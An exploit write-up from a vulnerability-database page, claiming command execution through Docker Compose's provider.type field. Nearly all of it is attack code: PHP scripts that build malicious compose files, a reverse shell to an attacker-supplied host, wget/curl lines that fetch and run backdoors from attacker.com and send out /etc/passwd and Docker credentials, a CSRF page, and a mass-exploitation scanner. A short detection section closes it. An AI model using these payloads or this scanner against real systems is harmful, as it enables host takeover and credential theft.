Vulners
Lucene search
📄 Docker Compose 2.40.3 Command Execution
=============================================================================================================================================
| # Title : Docker Compose v 2.40.3 Provider Type PHP Command Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://docs.docker.com/compose/releases/prior-releases/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212673/ &
[+] Summary : Docker Compose Provider Type Command Execution is a critical vulnerability (CVE pending) that allows arbitrary command execution
on the host system when processing Docker Compose files containing the provider.type field. This vulnerability exists due to Docker
Compose's design to execute any specified provider type as a binary or script on the host without proper validation or isolation.
[+] POC :
1. Creating malicious files via PHP
Example: A PHP page generates malicious Docker Compose files
<?php
// exploit-docker-compose.php
if (isset($_GET['cmd'])) {
$cmd = base64_decode($_GET['cmd']);
// إنشاء محتوى docker-compose.yml
$composeContent = <<<YAML
services:
exploit:
provider:
type: /bin/sh
command: -c "{$cmd}"
YAML;
// إنشاء محتوى البروفايدر المزيف (لطرق بديلة)
$scriptContent = "#!/bin/sh\n{$cmd}\n";
header('Content-Type: text/plain');
echo $composeContent;
exit;
}
// أو حفظ الملف على الخادم
if (isset($_POST['save_exploit'])) {
$composeContent = <<<YAML
services:
backdoor:
provider:
type: /tmp/exploit.sh
YAML;
$scriptContent = "#!/bin/sh\nbash -i >& /dev/tcp/{$_POST['lhost']}/{$_POST['lport']} 0>&1 &\n";
file_put_contents('/tmp/docker-compose.yml', $composeContent);
file_put_contents('/tmp/exploit.sh', $scriptContent);
chmod('/tmp/exploit.sh', 0755);
echo "Files created!";
}
?>
Exploiting platforms that allow uploading Docker Compose files
Example: Exploiting a control panel that allows uploading YAML files
<?php
// file-upload-exploit.php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['dockerfile'])) {
$uploadDir = '/var/www/uploads/';
$composeFile = $uploadDir . basename($_FILES['dockerfile']['name']);
// تحقق بسيط للملف (يمكن تجاوزه)
if (move_uploaded_file($_FILES['dockerfile']['tmp_name'], $composeFile)) {
// محتوى ضار داخل ملف compose
$maliciousContent = <<<YAML
services:
app:
image: nginx
provider:
type: /bin/sh
command: -c "wget http://attacker.com/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh"
db:
image: mysql
environment:
MYSQL_ROOT_PASSWORD: $(curl http://attacker.com/steal.php?data=$(cat /etc/passwd|base64))
YAML;
file_put_contents($composeFile, $maliciousContent);
// محاولة تشغيل docker compose (إذا كانت الصلاحيات تسمح)
if (isset($_POST['auto_run'])) {
$output = shell_exec("cd $uploadDir && docker compose up -d 2>&1");
echo "<pre>Output: $output</pre>";
}
}
}
?>
<form method="POST" enctype="multipart/form-data">
Upload Docker Compose: <input type="file" name="dockerfile">
<br>
Auto-run: <input type="checkbox" name="auto_run">
<br>
<input type="submit" value="Upload">
</form>
3. Exploiting API endpoints that interact with Docker
Example: Injecting commands into an API that manages Docker containers
<?php
// api-exploit.php
// محاكاة endpoint لـ Docker API
if (isset($_POST['compose_config'])) {
$config = json_decode($_POST['compose_config'], true);
// نقطة الضعف: عدم التحقق من provider.type
$yamlContent = yaml_emit($config);
// حفظ الملف المؤقت
$tempFile = tempnam('/tmp', 'docker_');
file_put_contents($tempFile, $yamlContent);
// تنفيذ الأمر (مع صلاحيات)
$output = shell_exec("docker compose -f $tempFile up 2>&1");
// تنظيف (قد لا ينفذ إذا فشل الأمر)
unlink($tempFile);
echo json_encode(['output' => $output]);
exit;
}
// payload للاستغلال
$payload = [
'services' => [
'malicious' => [
'provider' => [
'type' => '/bin/sh'
],
'command' => '-c "echo pwned > /tmp/hacked && cat /etc/shadow | base64 > /tmp/stolen"'
]
]
];
// إرسال الهجوم
$ch = curl_init('http://target.com/api/docker/deploy');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'compose_config' => json_encode($payload)
]);
$response = curl_exec($ch);
curl_close($ch);
echo "Attack sent!";
?>
4. CSRF + Docker Compose Exploit
Example: Exploiting CSRF in the Docker Administrator Interface
<?php
// csrf-exploit.html (يتم رفعه على خادم المهاجم)
?>
<html>
<body>
<script>
// CSRF لاستغلال Docker Compose
fetch('http://victim.com/docker/deploy', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
name: 'innocent-app',
compose: `services:
innocent:
image: nginx
provider:
type: /bin/bash
command: -c "curl http://attacker.com/steal.sh | bash"
backup:
image: busybox
command: sh -c "cat /var/lib/docker/config.json | base64 | curl -X POST -d @- http://attacker.com/log"`
})
});
</script>
<img src="http://victim.com/docker/deploy?action=up&file=http://attacker.com/malicious-compose.yml" onload="alert('Exploited')">
</body>
</html>
5. Mass Exploitation Scanner
A scanner for searching for servers vulnerable to the exploit.
<?php
// docker-scanner.php
class DockerComposeScanner {
private $targets = [];
public function addTarget($url) {
$this->targets[] = $url;
}
public function scan() {
foreach ($this->targets as $target) {
$this->testVulnerability($target);
}
}
private function testVulnerability($url) {
// اختبار 1: رفع ملف مباشر
$testCompose = tempnam(sys_get_temp_dir(), 'test_');
$maliciousContent = <<<YAML
services:
test:
provider:
type: /bin/echo
command: VULNERABLE
YAML;
file_put_contents($testCompose, $maliciousContent);
// محاولة رفع إلى الهدف
$ch = curl_init($url . '/upload');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'file' => new CURLFile($testCompose, 'text/yaml', 'docker-compose.yml')
]);
$response = curl_exec($ch);
if (strpos($response, 'VULNERABLE') !== false) {
$this->log("VULNERABLE: $url");
$this->exploit($url);
}
unlink($testCompose);
}
private function exploit($url) {
// تنفيذ استغلال كامل
$reverseShell = base64_encode('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1');
$payload = [
'compose' => <<<YAML
services:
exploit:
provider:
type: /bin/bash
command: -c "echo $reverseShell | base64 -d | bash"
YAML
];
// إرسال Payload
$ch = curl_init($url . '/api/deploy');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_exec($ch);
}
private function log($message) {
file_put_contents('scan.log', date('Y-m-d H:i:s') . " - $message\n", FILE_APPEND);
echo "$message\n";
}
}
// الاستخدام
$scanner = new DockerComposeScanner();
$scanner->addTarget('http://target1.com');
$scanner->addTarget('http://target2.com');
$scanner->scan();
?>
6. Webhook Exploitation
Exploiting webhooks that launch Docker Compose
<?php
// webhook-exploit.php
// معالجة webhook من GitHub/GitLab/etc
$payload = json_decode(file_get_contents('php://input'), true);
if (isset($payload['ref'])) {
// محاكاة سكربت النشر
$repoUrl = $payload['repository']['clone_url'];
// استنساخ المستودع (قد يحتوي على ملفات ضارة)
$cloneDir = '/tmp/repo_' . uniqid();
shell_exec("git clone $repoUrl $cloneDir");
// تشغيل docker compose إذا وجد
if (file_exists("$cloneDir/docker-compose.yml")) {
// تنفيذ الأمر الضار
shell_exec("cd $cloneDir && docker compose up -d");
// تنظيف (قد يفشل إذا كان هناك عملية خلفية)
shell_exec("rm -rf $cloneDir");
}
// أو حقن ملف ضار
$injectedCompose = <<<YAML
services:
web:
image: nginx
provider:
type: /bin/sh
command: -c "curl http://attacker.com/c2.php?host=$(hostname) | bash"
YAML;
file_put_contents("$cloneDir/docker-compose.yml", $injectedCompose);
shell_exec("cd $cloneDir && docker compose up");
}
?>
Attack detection
PHP detection system:
<?php
// intrusion-detection.php
class DockerIntrusionDetection {
public static function monitor() {
$logs = [
'/var/log/docker.log',
'/var/log/syslog',
'/var/log/auth.log'
];
$patterns = [
'/provider\.type.*(\/bin\/|\/tmp\/|\/dev\/)/',
'/docker compose.*(curl|wget|bash|sh).*(attacker|exploit)/i',
'/execution.*(compose|docker).*(provider|type)/i'
];
foreach ($logs as $log) {
if (file_exists($log)) {
$content = file_get_contents($log);
foreach ($patterns as $pattern) {
if (preg_match($pattern, $content)) {
self::alert($pattern, $log);
}
}
}
}
}
private static function alert($pattern, $log) {
$message = "DOCKER EXPLOIT DETECTED!\n";
$message .= "Pattern: $pattern\n";
$message .= "Log file: $log\n";
$message .= "Time: " . date('Y-m-d H:i:s') . "\n";
// إرسال تنبيه
mail('[email protected]', 'Security Alert - Docker Exploit', $message);
syslog(LOG_ALERT, $message);
}
}
// تشغيل المراقبة
DockerIntrusionDetection::monitor();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Dec 2025 00:00Current
7.4High risk
Vulners AI Score7.4